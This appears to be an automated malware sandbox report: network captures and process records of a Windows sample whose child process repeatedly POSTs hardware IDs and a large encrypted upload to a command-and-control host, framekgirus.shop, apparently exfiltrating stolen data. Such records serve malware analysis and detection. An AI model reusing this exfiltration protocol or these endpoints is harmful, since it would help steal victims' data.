2024-12-30 10:59:43 UTC  5053               OUT        Data Raw: 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61 d3 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 9b dc 40 f0 eb b1 64 f0 52 3c 78 29 f8 d7 c1
    Data Ascii: lrQMn 64F6(X&7~`aO@dR<x)
2024-12-30 10:59:44 UTC  1125               IN         HTTP/1.1 200 OK
    Date: Mon, 30 Dec 2024 10:59:44 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: PHPSESSID=pdr88snifnv7mtv64qt9d0seo7; expires=Fri, 25 Apr 2025 04:46:23 GMT; Max-Age=9999999; path=/
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    X-Frame-Options: DENY
    X-Content-Type-Options: nosniff
    X-XSS-Protection: 1; mode=block
    cf-cache-status: DYNAMIC
    vary: accept-encoding
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jPyIcMt%2FvVBhbvGv17ta%2FoXBoLFsxiEdTaNoNgw5T8iMiAXbD1USsiS%2BQFbykUYekFvOr61E6rCy52LHFpkIgfOO5JOGrlUTfpw6CoIRS0HPkY2mBEmkDLLIS3uwktsBlGEh"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8fa185a6d95a1831-EWR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=1667&min_rtt=1655&rtt_var=645&sent=12&recv=26&lost=0&retrans=0&sent_bytes=2840&recv_bytes=21338&delivery_rate=1663817&cwnd=235&unsent_bytes=0&cid=279257aa012bc27a&ts=638&x=0"
2024-12-30 10:59:44 UTC  20                 IN         Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
    Data Ascii: fok 8.46.123.189
2024-12-30 10:59:44 UTC  5                  IN         Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                7192.168.2.449743104.21.18.194437940C:\FkSpRTrp\jyidkjkfhjawd.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-12-30 10:59:45 UTC276OUTPOST /api HTTP/1.1
                                                                                                                Connection: Keep-Alive
                                                                                                                Content-Type: multipart/form-data; boundary=99SFX13IJKICJ
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                Content-Length: 1239
                                                                                                                Host: framekgirus.shop
                                                                                                                2024-12-30 10:59:45 UTC1239OUTData Raw: 2d 2d 39 39 53 46 58 31 33 49 4a 4b 49 43 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 35 38 45 36 39 30 41 30 42 42 32 32 44 38 36 32 30 41 34 43 34 37 36 46 44 35 31 42 43 42 31 0d 0a 2d 2d 39 39 53 46 58 31 33 49 4a 4b 49 43 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 39 39 53 46 58 31 33 49 4a 4b 49 43 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 6e 62 59 52 4b 6c 2d 2d 0d 0a 2d 2d 39 39 53 46 58 31 33 49 4a 4b 49 43 4a 0d 0a 43
                                                                                                                Data Ascii: --99SFX13IJKICJContent-Disposition: form-data; name="hwid"658E690A0BB22D8620A4C476FD51BCB1--99SFX13IJKICJContent-Disposition: form-data; name="pid"1--99SFX13IJKICJContent-Disposition: form-data; name="lid"nbYRKl----99SFX13IJKICJC
                                                                                                                2024-12-30 10:59:56 UTC1130INHTTP/1.1 200 OK
                                                                                                                Date: Mon, 30 Dec 2024 10:59:56 GMT
                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                Transfer-Encoding: chunked
                                                                                                                Connection: close
                                                                                                                Set-Cookie: PHPSESSID=g6irn5grhl8gdf0rgqk62iqsu4; expires=Fri, 25 Apr 2025 04:46:35 GMT; Max-Age=9999999; path=/
                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                Pragma: no-cache
                                                                                                                X-Frame-Options: DENY
                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                vary: accept-encoding
                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XSPwd7qQ1K%2BJjfEKYzfnCsnE3f4W2DbnT1AtIl7kjOnewAjKQvwnGpkk6Cj75%2FvlCHAf%2FZD8XiKcsNXEnl9cUI58lmib6y0PzsB3Zco5nfR9drwYXA2%2FyhHNCJUXKR%2FFF63%2F"}],"group":"cf-nel","max_age":604800}
                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                Server: cloudflare
                                                                                                                CF-RAY: 8fa185b099f77c8d-EWR
                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1787&min_rtt=1780&rtt_var=683&sent=5&recv=9&lost=0&retrans=0&sent_bytes=2840&recv_bytes=2151&delivery_rate=1585233&cwnd=185&unsent_bytes=0&cid=8fae1bd2e8eece7a&ts=11654&x=0"
                                                                                                                2024-12-30 10:59:56 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                Data Ascii: fok 8.46.123.189
                                                                                                                2024-12-30 10:59:56 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                Data Ascii: 0


                                                                                                                Session ID: 8
                                                                                                                Source IP: 192.168.2.4
                                                                                                                Source Port: 49744
                                                                                                                Destination IP: 104.21.18.194
                                                                                                                Destination Port: 443
                                                                                                                PID: 7940
                                                                                                                Process: C:\FkSpRTrp\jyidkjkfhjawd.exe
                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                2024-12-30 10:59:57 UTC | 277 | OUT | POST /api HTTP/1.1
                                                                                                                Connection: Keep-Alive
                                                                                                                Content-Type: multipart/form-data; boundary=XE2IAUBU8RSB
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                Content-Length: 584180
                                                                                                                Host: framekgirus.shop
                                                                                                                2024-12-30 10:59:57 UTC15331OUTData Raw: 2d 2d 58 45 32 49 41 55 42 55 38 52 53 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 35 38 45 36 39 30 41 30 42 42 32 32 44 38 36 32 30 41 34 43 34 37 36 46 44 35 31 42 43 42 31 0d 0a 2d 2d 58 45 32 49 41 55 42 55 38 52 53 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 58 45 32 49 41 55 42 55 38 52 53 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 6e 62 59 52 4b 6c 2d 2d 0d 0a 2d 2d 58 45 32 49 41 55 42 55 38 52 53 42 0d 0a 43 6f 6e 74 65
                                                                                                                Data Ascii: --XE2IAUBU8RSBContent-Disposition: form-data; name="hwid"658E690A0BB22D8620A4C476FD51BCB1--XE2IAUBU8RSBContent-Disposition: form-data; name="pid"1--XE2IAUBU8RSBContent-Disposition: form-data; name="lid"nbYRKl----XE2IAUBU8RSBConte
                                                                                                                2024-12-30 10:59:57 UTC15331OUTData Raw: b7 4d 66 b9 39 4d 74 eb 15 35 a9 c4 41 7b 9f d0 c5 2c 55 6c 44 45 fc 71 26 f0 3e 08 95 5d aa 99 29 bd c6 8f 1b 18 dc ca 2b 24 3e 86 bd d4 09 03 25 4a 95 08 fa f3 f4 46 43 6d cc d0 91 b3 93 da e1 7f 7d dc 27 6a 83 b9 dd d2 4f 70 e6 7f 5e 78 70 6a cd 7c 46 a6 ab ea 41 b6 3a 9a 3d ad 6e ca 7e ff 3e 15 a2 ef 30 15 b2 a1 af 9a 77 b0 a9 7a a2 1a 94 24 ed 09 29 bc 3b d3 d2 c5 79 26 bf 02 37 c8 df 03 6d 41 d5 d1 bd 09 a7 39 3b 66 0b 4d c2 dc 0f a5 ec c5 4d 33 86 5c dc 7c 94 bb 56 79 43 78 1b ce e7 af af d7 1c a4 9e 67 a7 cf fb c4 08 03 a0 17 41 b5 46 a5 d0 2c 8b c4 e8 3f c5 bb 57 4f fa 2d 7f 09 cf 01 3d c2 be b7 75 9f 80 9e 6a c0 0e de bd 9e 7c f0 93 eb 6a 4a 59 60 a7 9b 0a df 7d 36 ea 34 db 6c 6e 73 9d 77 92 22 4b a6 c2 5e 4c fe 59 83 f8 ad 13 87 7e 74 10 f5 de
                                                                                                                Data Ascii: Mf9Mt5A{,UlDEq&>])+$>%JFCm}'jOp^xpj|FA:=n~>0wz$);y&7mA9;fMM3\|VyCxgAF,?WO-=uj|jJY`}64lnsw"K^LY~t
                                                                                                                2024-12-30 10:59:57 UTC15331OUTData Raw: bc a2 d8 28 b0 27 35 bd 6c 84 82 e7 47 e3 38 40 f1 53 31 d8 9f 37 53 da 7d e3 c9 61 82 4a 40 7a 17 53 6e 36 5b c7 d2 b9 ce da 08 25 ea 65 f1 3c 9a 83 41 b0 9b b2 36 94 f7 42 21 9a 3e b4 05 16 3d 0e 99 5d 6c 90 14 d4 75 3b ff 5e e9 82 df be 48 21 b5 d7 a9 34 c2 77 5a 66 06 9c c0 e7 0b 41 27 2f aa fe be c3 56 12 44 32 09 83 e8 26 bb cb 79 9c 2b 62 d8 cc 56 98 5f ec f5 7a 12 c0 37 69 7d 67 b3 fb ab 80 72 4d 25 56 73 cd ab eb 69 a8 9d cb c6 c0 63 58 99 d3 6d 06 dd 3a 8d 98 df cb e3 34 da 0a 51 f7 61 4e 4a 9e 27 75 30 22 bd 78 63 08 cf 23 be f1 88 ba 42 bc 0f 1d 2a c5 d9 e7 19 c0 f1 7b f3 0f 81 f2 7f 91 81 b1 39 5f 1c b5 f7 45 d7 0f 6f 97 de 94 8e 0a f7 9d ba 06 cc 44 64 96 1b 0b 72 2e e6 ba d8 c3 9c ac 8d b0 0e 8e f6 07 8e 69 0c 2b c1 99 c3 c7 ce 48 a6 90 95
                                                                                                                Data Ascii: ('5lG8@S17S}aJ@zSn6[%e<A6B!>=]lu;^H!4wZfA'/VD2&y+bV_z7i}grM%VsicXm:4QaNJ'u0"xc#B*{9_EoDdr.i+H
                                                                                                                2024-12-30 10:59:57 UTC15331OUTData Raw: 34 06 2b 29 17 59 7f f4 0c fa 8f a5 0e cd 3c 0f 5f 81 72 90 c1 17 1d 88 5d 89 db d5 47 ee be 6a be 65 6d fc 88 61 d3 11 e4 01 04 21 e7 9e 73 76 05 8a bf 3b ab 96 06 6b 55 0a 38 a7 07 84 c8 be 9c a3 ec 31 14 08 cf 6e a9 95 c8 b8 fc 5f fc fe b8 73 c3 47 fa c2 97 4f de 17 2c 3a 07 b6 d8 cc 0b 9e af b9 3b 10 40 09 f0 da aa dc 83 ad ee be 60 7f 3e aa 5a 54 bb 54 00 1c 4a 20 b2 21 d7 79 69 13 b7 85 52 f9 6d 22 a5 b2 20 8f 45 f4 ab bb 13 15 2f 9c 52 e1 7b 7b 13 78 ce 97 99 10 4d 01 69 cb 30 b2 9f 1b de 4c a1 6f 44 de e1 9c 84 78 13 e0 91 4b 19 00 f9 9d 20 7e 37 f3 e5 f2 e8 79 82 e8 73 86 81 9e ba e4 7d 48 6d 1d 01 34 03 3c a0 10 17 cb 6a 1b 60 35 79 c1 a7 20 42 ee d3 a2 12 9e f4 94 c2 d3 75 f4 9f ea 5f 98 3b 2b 05 01 d4 e3 5f e7 0d 01 ae 62 67 99 c9 67 65 15 92
                                                                                                                Data Ascii: 4+)Y<_r]Gjema!sv;kU81n_sGO,:;@`>ZTTJ !yiRm" E/R{{xMi0LoDxK ~7ys}Hm4<j`5y Bu_;+_bgge
                                                                                                                2024-12-30 10:59:57 UTC15331OUTData Raw: f0 5a d3 1a 8f 52 53 8a 8a 64 0f 08 d7 f3 e5 8a e0 14 fd 94 0e 72 73 a3 43 1c a1 57 b2 eb a4 95 cf 4b 6b 34 ac 58 52 73 ae a9 c8 6f 37 89 31 68 a8 ab ea 56 42 7d 67 e4 3d 31 8b bd 22 2e 13 7c a8 d6 4a 12 9c b8 d1 78 69 c7 5b 60 ce 71 6f 34 db 11 fa da 0f 9f ef af 9f d9 1c f9 d1 a7 27 c5 96 d7 68 a4 cd b4 ec d7 1e 8d 88 8d 49 63 f0 84 42 f1 f2 ae 5f ee 57 ae 96 a9 00 9a ab ca e0 f4 12 64 56 1d 6e 97 a3 a2 8a 9f 0f 6d 5f 59 f3 1b 6d db b0 ac 68 59 7b bd e9 16 17 59 b7 ae 76 90 27 51 45 65 a0 71 23 de e3 90 48 9a 21 17 b5 0d d8 9b e6 69 86 fe 1c 1d e5 b6 01 2d 08 fe fb 9e 8a c3 24 d3 0a 4e c8 8f 68 d1 e6 bb 83 ab de e9 24 87 bc 5a ae 0c a7 75 8a 27 f1 30 20 5e 20 b6 38 88 22 b4 85 e6 ac 41 7c 85 06 78 e7 2a 34 5a 60 1d 05 2f 35 4c 9d 7b 24 3e 7c 1e cd ac 69
                                                                                                                Data Ascii: ZRSdrsCWKk4XRso71hVB}g=1".|Jxi[`qo4'hIcB_WdVnm_YmhY{Yv'QEeq#H!i-$Nh$Zu'0 ^ 8"A|x*4Z`/5L{$>|i
                                                                                                                2024-12-30 10:59:57 UTC15331OUTData Raw: 3a 2d 47 62 53 4c 7a 3a a4 64 0b bb b5 37 65 c4 62 6f e6 0d 7c 59 83 89 cc 04 34 3f 7c 8f 11 b8 e8 2a 1f aa ef dc 5a 63 ec 89 11 39 53 85 c0 79 a9 e4 98 45 f1 d6 90 c7 a9 63 b3 c9 d5 0e 07 bc 26 fa d4 0a d3 0b 44 67 c8 48 f3 49 be ef 45 be 82 7d 31 5e ea 3a d9 bb 94 d5 31 aa 80 17 12 15 65 ae cd a7 16 62 fb fd 33 5d 6c 26 05 0e eb 34 7b fb 6e ed 13 4a 4e d8 9b a7 c3 e5 d3 4b 84 8c 3c 41 f1 a1 91 1d 20 73 e1 1c b3 81 71 e8 b2 47 ac 29 96 35 f5 b1 e0 53 65 17 e4 96 12 26 80 1c 61 47 fc 8a 7f 42 a4 11 b0 8b b9 3c 53 03 d3 40 8d 4a d8 e4 f4 4c 4e 33 0e ec 57 6b b7 87 1f 83 19 c5 ea ff 18 25 ad c1 93 ad 57 78 02 f7 02 16 54 e5 7b 91 48 f3 23 a7 2a 67 aa 87 0f bc d2 dd f5 d5 b9 77 ba 35 ad e4 ce 7f 74 88 ee 4a 31 09 07 8b d1 22 1c 47 9e 9f 2c 0a 0d ae 9d 22 fc
                                                                                                                Data Ascii: :-GbSLz:d7ebo|Y4?|*Zc9SyEc&DgHIE}1^:1eb3]l&4{nJNK<A sqG)5Se&aGB<S@JLN3Wk%WxT{H#*gw5tJ1"G,"
                                                                                                                2024-12-30 10:59:57 UTC15331OUTData Raw: be 72 b7 f4 5b ed 3f af ee 94 ed 2b 5d 9a d4 dd 4d e0 f6 b6 fe 5d c5 fd 33 bc 87 b0 b1 94 d6 8a 5d 7c a5 0c 7a d2 04 06 29 30 2c 22 60 52 b5 79 5d 14 a4 31 c0 62 dd f8 ef 43 20 1b 05 33 b5 33 b5 70 16 80 90 0d a1 10 08 71 b0 2e 0e e5 bc 1e 50 fb 75 1a c9 0b a5 e0 e4 96 d9 07 7b 0c 10 bc 70 51 fc f0 7e 42 d6 e6 c5 fe f4 8f 1a df 77 8a 98 a2 c3 61 f8 59 d3 e5 e5 ee ee ca 3f 0b 57 45 53 c3 d8 86 39 66 1f 62 58 de de 1b ee 2f 1e 41 a4 0c 2f fa 21 30 6b ed 2d 0c 44 04 b1 2d 92 db cd 11 79 cb eb 25 8f 9a 6f 5f 16 d5 c4 f3 52 6c ff d1 a5 87 17 3c f1 6d ff c0 ab f2 50 97 1c 2c 0f dd 29 05 41 18 f8 10 06 ff 6e 17 5e 00 f1 67 2a 3d 5b d0 66 ac ca 8f 8f 7e fc ed 78 ba 00 b8 f4 83 1d fb 03 14 b6 10 6b 2a 93 82 70 36 d6 93 9c 5b 33 b9 3c b5 25 93 66 c0 39 22 9f dd 9a
                                                                                                                Data Ascii: r[?+]M]3]|z)0,"`Ry]1bC 33pq.Pu{pQ~BwaY?WES9fbX/A/!0k-D-y%o_Rl<mP,)An^g*=[f~xk*p6[3<%f9"
                                                                                                                2024-12-30 10:59:57 UTC15331OUTData Raw: 05 f1 9b 93 fc 60 84 6f 95 74 67 e2 e8 46 5f 46 ce 7f ae e5 77 19 c1 c5 ac 9b 77 0d e6 22 e6 95 ee 70 73 04 07 0b be ec 4e fb 61 72 df 6e c3 7b b1 b4 2d 4d 29 a5 35 b4 a6 c2 e5 d2 a5 cd 4d 36 8b 73 3f de 8c a3 cf 38 3a b7 6c 11 38 21 05 f7 5a 48 74 03 6a 8c c4 ff 82 c7 6c 70 39 f3 31 81 65 39 72 24 92 33 5b 3e e1 ea 32 38 53 be dc bd c2 41 2a 2a 86 94 b1 59 28 2d 2c 6d 32 e5 a9 7f c9 82 12 6e 4d 53 20 06 63 c9 47 e2 b3 2c 6d 22 48 12 b2 7e 11 ce 0d 20 f5 2a b6 76 58 54 b8 ff 5e 50 68 ad a4 1c 21 24 16 7d 63 c4 11 64 34 37 38 e7 80 cd d0 08 b4 eb 5a 2d cc fb 92 71 09 8b 8f 7f ff 58 10 1e 16 84 fe a4 d1 dd 83 3f 0b 31 56 fd 67 b6 26 fc 4f 55 f1 05 9f e9 09 68 ba f5 2d 6d e4 bf 2f 13 1b 9a ad 07 86 b8 23 c7 5e 81 c5 b1 11 86 cc c2 4a 95 f3 17 c9 2a e7 1e 0c
                                                                                                                Data Ascii: `otgF_Fww"psNarn{-M)5M6s?8:l8!ZHtjlp91e9r$3[>28SA**Y(-,m2nMS cG,m"H~ *vXT^Ph!$}cd478Z-qX?1Vg&OUh-m/#^J*
                                                                                                                2024-12-30 10:59:57 UTC15331OUTData Raw: 05 7d ad 61 82 95 dd 33 36 f5 f6 6d eb 8e a7 7e fd a9 ab fd 7b 5b 90 5d fe 02 8f 28 3a f2 66 42 c8 bb 11 94 d7 a5 d1 49 cb 37 c2 e0 24 b4 57 6b da e8 b3 ea 14 a1 80 85 6f 19 94 99 85 5d 98 1a 27 f2 4d d4 2e d4 b7 55 9a 1c 61 d9 9f 7a 0d 78 fd 48 d8 1f c1 cf 31 40 37 17 5a 46 31 38 65 79 68 17 be fc 04 35 8f 8d 81 7c 2a 91 4d 8a ae ba 8b b6 a3 67 1b 01 1c 56 6a 1b 29 b6 3b 65 17 4f b5 55 70 b4 04 6b 80 85 7e ad bf 78 e5 b2 9f 76 74 dd ed 21 32 2c df 00 61 f0 78 21 c5 cb 6f 55 94 ef 35 d8 eb ce ec 5a 7b a1 2a f4 d8 58 e7 7e 54 fa 05 d6 11 a4 ea ac 06 3e 75 dd 36 6f e3 99 1f de a6 9b 1f a7 7a 3e 8f a5 78 f8 bd 2b a0 65 e0 0c 16 c7 47 36 4e f0 5b 7f 0c a3 75 49 98 7c ff 26 d6 ca ee 8c 26 94 f1 f9 ac eb eb f1 08 93 a6 68 e6 a3 e6 5c 38 2a aa 44 b9 d0 ff 93 de
                                                                                                                Data Ascii: }a36m~{[](:fBI7$Wko]'M.UazxH1@7ZF18eyh5|*MgVj);eOUpk~xvt!2,ax!oU5Z{*X~T>u6oz>x+eG6N[uI|&&h\8*D
                                                                                                                2024-12-30 10:59:57 UTC15331OUTData Raw: 59 56 ca 60 66 eb 8c a1 8d ea 29 32 32 cd a1 8d 8a 1a e5 b9 66 c2 9c 56 37 ed fc b3 df fa 92 50 6d 12 c5 69 32 82 52 86 79 25 e2 90 77 99 5c 1b 26 0b 6d 91 f9 54 29 04 44 ec 8a 02 09 47 59 9c 75 ff 31 22 bb 2f a6 3d b4 14 d7 5c 17 90 ff 8a 81 ce d9 a5 58 fe ef 38 29 fb a3 d2 da 37 39 da b7 e5 d3 03 6c 11 e5 08 06 79 fe d7 45 5c 61 b2 15 b3 c6 bb 1f a5 ba a7 3f a4 48 ba 4f 77 6a 99 e5 50 97 15 69 5f fb 4e a5 9c c0 fa 91 99 52 5a 74 9e d8 f4 ad bc 5b 39 ac d0 4f 5b b2 ff 9d 30 73 62 7e 3b 20 39 c5 86 e2 be 5a 9c 0a 1f f8 d7 cb 60 cf f2 87 ba d9 17 b3 91 ef a5 1b bd c2 5f 2e 56 eb cd b8 2b cf 5a fe 83 3e fb 0f da 35 42 6a b6 5a b4 63 ed 1b ab 6f a6 34 ed 63 5f c0 13 e9 c2 bc e9 98 63 b7 4e ba 04 ed 75 3b af 68 25 d0 01 6e da 65 68 a8 1f 3d 17 b4 7d d0 6c b9
                                                                                                                Data Ascii: YV`f)22fV7Pmi2Ry%w\&mT)DGYu1"/=\X8)79lyE\a?HOwjPi_NRZt[9O[0sb~; 9Z`_.V+Z>5BjZco4c_cNu;h%neh=}l
                                                                                                                2024-12-30 10:59:59 UTC | 1139 | IN | HTTP/1.1 200 OK
                                                                                                                Date: Mon, 30 Dec 2024 10:59:59 GMT
                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                Transfer-Encoding: chunked
                                                                                                                Connection: close
                                                                                                                Set-Cookie: PHPSESSID=ts9l1llkcvfh9cog7tbep3joqg; expires=Fri, 25 Apr 2025 04:46:38 GMT; Max-Age=9999999; path=/
                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                Pragma: no-cache
                                                                                                                X-Frame-Options: DENY
                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                vary: accept-encoding
                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PPxb%2Fe3hlIhutGI9%2Fz%2BbgYLipkUgH69dQ6%2F3tgSi3RSnC64J1VNVbvUZ0qQLPvp5kdU%2FzlpdY8V92TiIzJkUN3EpXfoVpkW%2BLVPKbJc%2BodRKTLhuRxUamByUETkGWjZ%2BOvPX"}],"group":"cf-nel","max_age":604800}
                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                Server: cloudflare
                                                                                                                CF-RAY: 8fa185ff3a02431a-EWR
                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1568&min_rtt=1562&rtt_var=599&sent=359&recv=601&lost=0&retrans=0&sent_bytes=2838&recv_bytes=586765&delivery_rate=1805813&cwnd=224&unsent_bytes=0&cid=425e372504592fa4&ts=1644&x=0"


                                                                                                                Session ID: 9
                                                                                                                Source IP: 192.168.2.4
                                                                                                                Source Port: 49745
                                                                                                                Destination IP: 104.21.18.194
                                                                                                                Destination Port: 443
                                                                                                                PID: 7940
                                                                                                                Process: C:\FkSpRTrp\jyidkjkfhjawd.exe
                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                2024-12-30 10:59:59 UTC | 264 | OUT | POST /api HTTP/1.1
                                                                                                                Connection: Keep-Alive
                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                Content-Length: 77
                                                                                                                Host: framekgirus.shop
                                                                                                                2024-12-30 10:59:59 UTC | 77 | OUT | Data Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 6e 62 59 52 4b 6c 2d 2d 26 6a 3d 26 68 77 69 64 3d 36 35 38 45 36 39 30 41 30 42 42 32 32 44 38 36 32 30 41 34 43 34 37 36 46 44 35 31 42 43 42 31
                                                                                                                Data Ascii: act=get_message&ver=4.0&lid=nbYRKl--&j=&hwid=658E690A0BB22D8620A4C476FD51BCB1
                                                                                                                2024-12-30 11:00:00 UTC | 1119 | IN | HTTP/1.1 200 OK
                                                                                                                Date: Mon, 30 Dec 2024 11:00:00 GMT
                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                Transfer-Encoding: chunked
                                                                                                                Connection: close
                                                                                                                Set-Cookie: PHPSESSID=94vbng0u3qnpoqgtsrojulb02t; expires=Fri, 25 Apr 2025 04:46:39 GMT; Max-Age=9999999; path=/
                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                Pragma: no-cache
                                                                                                                X-Frame-Options: DENY
                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                vary: accept-encoding
                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=54pFLItyiDYQcba0Lq2%2BdaApc5rkpYnbEU5TbeBFwFAQUxt8e2hmrk2cYHBK6nBmGF68XdIQ0IsRXhTvI6iXgca7fBOHwGNPEGSbHPuWq%2FDIHEdeEPBbGaJzS5HnbRCYqSyR"}],"group":"cf-nel","max_age":604800}
                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                Server: cloudflare
                                                                                                                CF-RAY: 8fa1860c3fd9726e-EWR
                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1864&min_rtt=1851&rtt_var=703&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2839&recv_bytes=977&delivery_rate=1577525&cwnd=224&unsent_bytes=0&cid=af9b34e36d37e1eb&ts=472&x=0"
                                                                                                                2024-12-30 11:00:00 UTC | 54 | IN | Data Raw: 33 30 0d 0a 6d 78 6d 6c 4a 6b 4b 2b 62 4a 57 61 76 47 67 73 69 43 41 6f 39 35 59 7a 6b 4e 4a 5a 49 6d 5a 78 73 76 6b 5a 63 4a 4c 42 34 45 62 41 52 41 3d 3d 0d 0a
                                                                                                                Data Ascii: 30mxmlJkK+bJWavGgsiCAo95YzkNJZImZxsvkZcJLB4EbARA==
                                                                                                                2024-12-30 11:00:00 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                Data Ascii: 0


                                                                                                                Target ID:0
                                                                                                                Start time:05:59:22
                                                                                                                Start date:30/12/2024
                                                                                                                Path:C:\Users\user\Desktop\eXbhgU9.exe
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:"C:\Users\user\Desktop\eXbhgU9.exe"
                                                                                                                Imagebase:0x3b0000
                                                                                                                File size:15'360 bytes
                                                                                                                MD5 hash:9BE5AC720DCF1838FD5A2D7352672F66
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:low
                                                                                                                Has exited:true

                                                                                                                Target ID:1
                                                                                                                Start time:05:59:22
                                                                                                                Start date:30/12/2024
                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                File size:862'208 bytes
